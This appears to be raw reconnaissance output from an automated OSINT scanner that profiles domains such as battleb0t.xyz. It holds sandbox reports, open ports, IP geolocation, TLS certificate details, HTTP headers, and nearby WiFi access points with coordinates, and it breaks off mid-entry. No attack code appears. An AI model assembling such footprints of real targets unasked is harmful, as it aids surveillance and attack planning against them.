| 2023-05-12 02:47:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'README.md', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ruffle.rs"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.64.192.12:443"\n "185.199.108.153:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1CC1.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1C90.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1AFD.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1CC0.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': 
u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2592"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_IE_EarlyTabStart_0x828_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_ConnHashTable<2592>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a20_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a20_IESQMMUTEX_0_303"\n "IsoScope_a20_ConnHashTable<2592>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1C2F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1C60.tmp" has 
type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1AEC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1B9C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1C2E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1D40.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1C5F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1B5C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00002592]\n "610531541889581066_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "ruffle_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 
00000000-00002592]\n "movavi_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "ruffle-nightly-bin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "test_rust_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "kongregate_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "test_web_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002592]\n "bubble-shooter_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]\n "dolldivine_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001216]\n "Cab1C2F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1C2F.tmp]- [targetUID: 00000000-00001216]\n "VHJPHVTF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VHJPHVTF.txt]- [targetUID: 00000000-00001216]\n "search_2_.json" has type "JSON data"- [targetUID: 00000000-00002592]\n "Tar1CC1.tmp" has type "data"- Location: [%TEMP%\\Tar1CC1.tmp]- [targetUID: 00000000-00001216]\n "Cab1C60.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1C60.tmp]- [targetUID: 00000000-00001216]\n "crazygames_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]\n "Tar1C90.tmp" has type "data"- Location: [%TEMP%\\Tar1C90.tmp]- [targetUID: 00000000-00001216]\n "armorgames_1_.png" has type "PNG image data 200 x 200 
8-bit/color RGBA non-interlaced"- [targetUID: 00000000-00002592]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 172.64.192.12 on port 443"\n "HTTPS traffic to 185.199.108.153 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /npm/v/@ruffle-rs/ruffle?color=007acc&logo=npm HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /discord/610531541889581066?label=&color=7389d8&labelColor=6a7ec2&logoColor=ffffff&logo=discord HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /github/actions/workflow/status/ruffle-rs/ruffle/test_web.yml?label=Web%20Build&logo=github&branch=master HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET 
/github/actions/workflow/status/ruffle-rs/ruffle/test_rust.yml?label=Rust%20Build&logo=github&branch=master HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: img.shields.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /aur/version/ruffle-nightly-bin?logo=archlinux HTTP/1.1\nAccept: image/png, | 185.199.111.153 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:443 | 104.21.6.166 |
| 2023-05-12 02:45:52 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Montreal', u'security': {u'is_vpn': False}, u'city_geoname_id': 6077243, u'region_geoname_id': 6115047, u'country': u'United States', u'region': u'Quebec', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'H4X', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:51'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2606:4700:3030::ac43:a8fc', u'continent': u'North America', u'region_iso_code': u'QC'} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-served-by: cache-lga21959-LGA | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F0:65:67) | 37.7813933,-122.3918002 |
| 2023-05-12 02:54:03 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 172.67.135.9 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) | 37.780462,-122.390564 |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 2 | 0 | None | http://ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60363a5a178c')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '94216',
cRay: '7c5f60363a5a178c',
cHash: 'a8c2f7f784ba63b',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
m: 'X3NUo99x/4mGPFmrz69qVs5k5pJtmgeVcyYRkA87vXs=',
i1: 'Sn1NO9u6sfSr5lno+YjwEg==',
i2: 'LxAqQZecIh4w4zR/ETAJ7g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60363a5a178c');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60363a5a178c';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:44:41 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 13 16:55:50.449 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 16:55:50.476 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:52 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=134 @ 90, 'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 78, 'Image XResolution': (0x011A) Ratio=72 @ 98, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 168, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 216, 'Image DateTime': (0x0132) ASCII=2023:01:11 18:24:47 @ 114, 'Image YResolution': (0x011B) Ratio=72 @ 106, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 180, 'EXIF ExifImageLength': (0xA003) Long=2316 @ 204, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 144, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 54, 'EXIF ExifImageWidth': (0xA002) Long=3088 @ 192, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 156} | https://funny.battleb0t.xyz/images/carti_1.jpg |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:10 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 2606:4700:3031::6815:6a6 |
| 2023-05-12 02:46:00 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:59'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'172.67.168.252', u'continent': u'North America', u'region_iso_code': u'IL'} | 172.67.168.252 |
| 2023-05-12 02:58:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/docs', u'type': u'submitted', u'verdict': u'malicious'}, {u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/favicon.ico', u'type': u'visited', u'verdict': u'suspicious'}, {u'url': u'http://psti-dot-wearatar-dev.uc.r.appspot.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://psti-dot-wearatar-dev.uc.r.appspot.com/docs', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"psti-dot-wearatar-dev.uc.r.appspot.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"psti-dot-wearatar-dev.uc.r.appspot.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF0CC.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file 
"TarF0CD.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fe8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fe8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fe8_ConnHashTable<4072>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fe8_IESQMMUTEX_0_331"\n "IsoScope_fe8_IE_EarlyTabStart_0x670_Mutex"\n "IsoScope_fe8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4072"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.250.191.84:80"\n "104.16.86.20:443"\n "34.74.170.74:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "WY7JZ84F.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WY7JZ84F.txt]- 
